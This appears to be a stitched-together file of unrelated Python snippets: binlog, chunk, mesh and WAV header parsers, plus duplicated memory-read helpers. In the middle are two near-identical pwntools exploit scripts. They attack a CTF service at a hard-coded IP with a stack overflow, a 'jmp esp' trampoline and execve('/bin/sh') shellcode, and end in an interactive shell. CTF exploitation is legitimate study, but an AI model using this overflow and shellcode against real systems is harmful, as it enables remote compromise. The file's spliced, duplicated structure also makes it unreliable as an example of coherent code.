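def binlog_reader(fd, fields):
    """Yield one decoded record per length-prefixed entry of a binlog.

    Args:
        fd: Binary file object; it is read to EOF in a single call.
        fields: Field names passed straight to query_factory (["*"] selects
            every field).

    Yields:
        The dict produced by query_factory's getter for each record.

    Raises:
        ValueError: a record header is truncated, a record declares a zero
            length (which would otherwise re-read the same offset forever),
            or a record's declared length runs past the end of the data.
    """
    get_query = query_factory(fields)
    buff = fd.read(-1)
    total = len(buff)
    offset = 0

    while offset < total:
        # Each record opens with a 16-bit length measured from the start of
        # the record itself (that is why `offset` advances by exactly `length`).
        if offset + 2 > total:
            raise ValueError("truncated record header at offset %d" % offset)
        length, = u("H", buff, offset)
        if length == 0:
            # A zero length never advances `offset`; refuse instead of spinning.
            raise ValueError("zero-length record at offset %d" % offset)
        if offset + length > total:
            raise ValueError("record at offset %d runs past end of data" % offset)
        yield get_query(offset, buff, length)
        offset += length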
def ReadDwordMemory(address=None):
    """Read a little-endian 32-bit unsigned value from memory.

    Args:
        address: Address to read from; when None, the current thread's EIP
            (threads.GetEip()) is used.

    Returns:
        The dword at *address* as an int.
    """
    target = threads.GetEip() if address is None else address
    raw = ReadMemory(4, target)
    (value,) = u('<I', raw)
    return value
def ReadDwordMemory(address=None):
    """Return the little-endian dword stored at *address*.

    Args:
        address: Memory address to read. Defaults to the current thread's
            instruction pointer as reported by threads.GetEip().

    Returns:
        The 32-bit unsigned value as an int.
    """
    if address is None:
        address = threads.GetEip()
    return u('<I', ReadMemory(4, address))[0]
def parse_main(s):
    """Walk the chunk table in *s* and print each chunk's id and payload size.

    Every chunk starts with an 8-byte native-endian header: two 16-bit
    fields (the chunk id and a second one the original calls ``cmpr``) and a
    32-bit payload size. The payload is skipped, not decoded.

    Args:
        s: bytes holding consecutive chunks.
    """
    pos = 0
    end = len(s)
    while pos < end:
        chunk_id, _cmpr, size = u('HHI', s[pos:pos + 8])
        pos += 8
        print(hex(chunk_id), size)
        pos += size
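def query_factory(fields):
    """Build a getter that decodes the requested *fields* of one binlog record.

    All offsets are relative to the record start (`offset`) and use native
    byte order, as in the original table: a 56-byte fixed part is followed
    by the variable-length `dname`, which fills the rest of the record's
    `length` bytes. Field names that are not in the table are silently
    ignored (unchanged behaviour).

    Args:
        fields: list of field names to extract, or ["*"] for all of them.

    Returns:
        A callable ``(offset, packet, length) -> dict`` mapping each selected
        field name to its decoded value.

    Raises:
        struct.error: from the returned getter when `packet` is shorter than
            the offsets/`length` require.
    """
    def _cats(packet, offset, length):
        # Eight one-byte slots; zero marks an unused slot. A list on both
        # Python 2 and 3 (the old filter() call became a lazy object on 3).
        return [x for x in u("BBBBBBBB", packet, offset + 40) if x != 0]

    def _dname(packet, offset, length):
        # b"" is str on Python 2 and bytes on Python 3, so the join works on
        # both; struct still raises if the record is shorter than `length`.
        return b"".join(u("c" * (length - 56), packet, offset + 56))

    # The functools.partial wrappers were no-ops and have been dropped.
    decoders = {
        "rcode": lambda packet, offset, length: u("B", packet, offset + 3)[0],
        "qtype": lambda packet, offset, length: u("H", packet, offset + 4)[0],
        # Key spelling kept as-is: callers select fields by this exact name.
        "timestam_usec": lambda packet, offset, length: u("Q", packet, offset + 8)[0],
        "client_ip": lambda packet, offset, length: ".".join(
            str(x) for x in u("BBBB", packet, offset + 28)),
        "profile_id": lambda packet, offset, length: u("I", packet, offset + 32)[0],
        "latency_usec": lambda packet, offset, length: u("I", packet, offset + 36)[0],
        "cats": _cats,
        "reserved5": lambda packet, offset, length: u("I", packet, offset + 48)[0],
        "reserved6": lambda packet, offset, length: u("I", packet, offset + 52)[0],
        "dname": _dname,
    }
    if fields == ["*"]:
        fields = decoders.keys()
    selected = {key: func for key, func in decoders.items() if key in fields}
    # .items() instead of .iteritems() so the getter also runs on Python 3.
    return lambda offset, packet, length: {
        key: func(packet, offset, length) for key, func in selected.items()}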
def parse_mesh(s):
    """Decode a mesh chunk and return its triangle count.

    Layout (native byte order): three uint32 (format version, vertex count,
    triangle count), a 6-float bounding box, then ``vCnt`` vertices of three
    floats and ``tCnt`` triangles of four uint32 (three indices plus one
    unknown word). Vertices are stored with Y and Z swapped and faces with
    the winding flipped, ready for the Blender (bpy) import that is
    currently disabled; only the triangle count is returned.

    Args:
        s: bytes of the chunk payload.

    Returns:
        The triangle count read from the header.
    """
    fmt_version, vert_count, tri_count = u('III', s[0:12])
    bbox = u('6f', s[12:36])
    pos = 36
    verts = []
    for _ in range(vert_count):
        x, y, z = u('fff', s[pos:pos + 12])
        pos += 12
        verts.append((x, z, y))
    faces = []
    for _ in range(tri_count):
        v1, v2, v3, _unknown = u('4I', s[pos:pos + 16])
        pos += 16
        faces.append((v1, v3, v2))
    # The bpy.data.meshes.new / from_pydata / scene.objects.link sequence
    # that consumed `verts` and `faces` is intentionally left out.
    return tri_count
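def read_wav_meta(filePath):
    """Return the header fields of a canonical 44-byte RIFF/WAVE header.

    The offsets used here (fmt chunk at 12, data chunk at 36) assume the
    canonical layout with no extra chunks between "fmt " and "data"; files
    with a different chunk order will be misread -- TODO confirm against the
    inputs this tool is meant for.

    Args:
        filePath: path of the .wav file to inspect.

    Returns:
        dict with chunkSize, compression, channels, sampleRate,
        bitsPerSample and size, all little-endian integers.

    Raises:
        ValueError: the file is shorter than a 44-byte header or does not
            carry the "RIFF"/"WAVE" magic.
    """
    with open(filePath, 'rb') as f:
        header = f.read(44)
    if len(header) < 44:
        # A short read used to surface as a struct.error deep in the parsing.
        raise ValueError("Input file too short for a wav header: " + filePath)
    # b"" literals compare correctly on both Python 2 (str) and 3 (bytes).
    if header[0:4] != b"RIFF" or header[8:12] != b"WAVE":
        raise ValueError("Input file not in wav format: " + filePath)

    meta = dict()
    meta['chunkSize'] = u('<I', header[16:20])[0]
    meta['compression'] = u('<H', header[20:22])[0]
    meta['channels'] = u('<H', header[22:24])[0]
    meta['sampleRate'] = u('<I', header[24:28])[0]
    meta['bitsPerSample'] = u('<H', header[34:36])[0]
    meta['size'] = u('<I', header[40:44])[0]
    return meta


if __name__ == "__main__":
    filename = sys.argv[1]
    filePath = os.path.join(os.getcwd(), filename)
    meta = read_wav_meta(filePath)

    print("\n-----------------------------------")
    pprint(meta)
    print("-----------------------------------\n")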
from pwn import *
from struct import pack as p, unpack as u

# Python 2 exploit script (print statements, str-typed shellcode) for a
# hard-coded CTF target: stack-based overflow in the "name" answer, with the
# "favorite number" answer used to plant a 4-byte trampoline.
host, port = ('130.211.202.98', 7575)

r = remote(host, port)

# prepare eip + ebp overwrite values
# Saved return address is pointed at `meow` (0x0804A048); presumably the
# global the service stores the favorite number in, so the integer sent
# below becomes the code executed on return -- verify against the binary.
new_eip = p('<I', 0x0804A048) # > 0804A048 meow 
# Saved ebp is overwritten with a marker value; nothing here relies on it.
new_ebp = p('<I', 0xDEADBEEF)

# prepare shellcode 
# 23-byte x86 Linux execve("/bin//sh"): xor eax,eax; push eax; push "//sh";
# push "/bin"; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0xb;
# int 0x80. edx (envp) is left as found.
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# prepare payload
# 40 filler bytes reach the saved ebp; the shellcode lands directly after the
# saved return address, i.e. where esp points once the function returns.
payload = "B"*40 + new_ebp + new_eip + shellcode

# send payload to victim
print r.recvuntil('What\'s your name?\n')
r.sendline(payload)
print r.recvuntil('What\'s your favorite number?\n')

# construct 4-byte trampoline in meow
# nop; nop; jmp esp, encoded as a signed little-endian int and sent in
# decimal so that, presumably, the service's integer parse writes exactly
# these four bytes into `meow` and the return into `meow` jumps to esp.
h = '\x90\x90\xff\xe4' # jmp esp = ff e4
trampoline = u('<i', h)
r.sendline("%d" % trampoline) 

# enjoy your shell
r.interactive()
r.close()
from pwn import *
from struct import pack as p, unpack as u

# Python 2 exploit script (print statements, str-typed shellcode) against a
# hard-coded CTF service: overflow via the "name" prompt, trampoline planted
# via the "favorite number" prompt.
host, port = ('130.211.202.98', 7575)

r = remote(host, port)

# prepare eip + ebp overwrite values
# Return address becomes `meow` (0x0804A048) -- presumably the global that
# receives the favorite number, so the value sent later is what executes on
# return; confirm against the binary.
new_eip = p('<I', 0x0804A048)  # > 0804A048 meow
# Marker value for the clobbered saved ebp; not otherwise relied upon.
new_ebp = p('<I', 0xDEADBEEF)

# prepare shellcode
# Classic 23-byte x86 Linux execve("/bin//sh"): xor eax,eax; push eax;
# push "//sh"; push "/bin"; mov ebx,esp; push eax; push ebx; mov ecx,esp;
# mov al,0xb; int 0x80. edx (envp) is not set explicitly.
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# prepare payload
# 40 bytes of filler up to the saved ebp, then ebp, return address and the
# shellcode, which sits where esp points right after the return.
payload = "B" * 40 + new_ebp + new_eip + shellcode

# send payload to victim
print r.recvuntil('What\'s your name?\n')
r.sendline(payload)
print r.recvuntil('What\'s your favorite number?\n')

# construct 4-byte trampoline in meow
# nop; nop; jmp esp packed as a signed little-endian int and sent as decimal
# text, so that the service's integer store (presumably into `meow`) lays
# down exactly these four bytes.
h = '\x90\x90\xff\xe4'  # jmp esp = ff e4
trampoline = u('<i', h)
r.sendline("%d" % trampoline)

# enjoy your shell
r.interactive()
r.close()
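def parse_0x1(s, tCnt):
    """Dump the 36-byte records of a type-0x1 chunk and pass *tCnt* through.

    Each record is decoded in native byte order as two uint32, six floats
    and one uint32 and printed as the raw tuple; its meaning is not known
    here.

    Args:
        s: bytes of the chunk payload.
        tCnt: triangle count from the preceding mesh chunk; returned unchanged.

    Returns:
        tCnt.

    Raises:
        struct.error: a record is shorter than 36 bytes (truncated payload).
    """
    pos = 0
    while pos < len(s):
        record = u('II6fI', s[pos:pos + 36])
        pos += 36
        print(record)
    # The vertex/face loops that used to follow were a copy of parse_mesh
    # and referenced names (vCnt, verts, faces) that are not defined in this
    # function, so reaching them raised NameError; they have been removed.
    return tCnt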


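# Read a .cform file chunk by chunk. Each chunk is an 8-byte native-endian
# header (uint32 id, uint32 payload size) followed by `sz` payload bytes.
# Chunk 0x0 is the mesh (parse_mesh); chunk 0x1 is handed to parse_0x1 with
# the triangle count from the mesh; any other id is skipped.
with open('build.cform', 'rb') as f:
    s = f.read()
p = 0
tCnt = None
while p < len(s):
    if p + 8 > len(s):
        raise ValueError("truncated chunk header at offset %d" % p)
    chunk_id, sz = u('II', s[p:p + 8])
    p += 8
    if p + sz > len(s):
        # A bogus size would otherwise hand a silently truncated slice to the parsers.
        raise ValueError("chunk 0x%x at offset %d runs past end of file" % (chunk_id, p - 8))
    if chunk_id == 0x0:
        tCnt = parse_mesh(s[p:p + sz])
    elif chunk_id == 0x1:
        if tCnt is None:
            # Used to fail with an unbound-name error; say what is actually wrong.
            raise ValueError("chunk 0x1 seen before the mesh chunk 0x0")
        parse_0x1(s[p:p + sz], tCnt)
    p += sz
# Block until Enter is pressed, presumably so the printed output stays visible.
input()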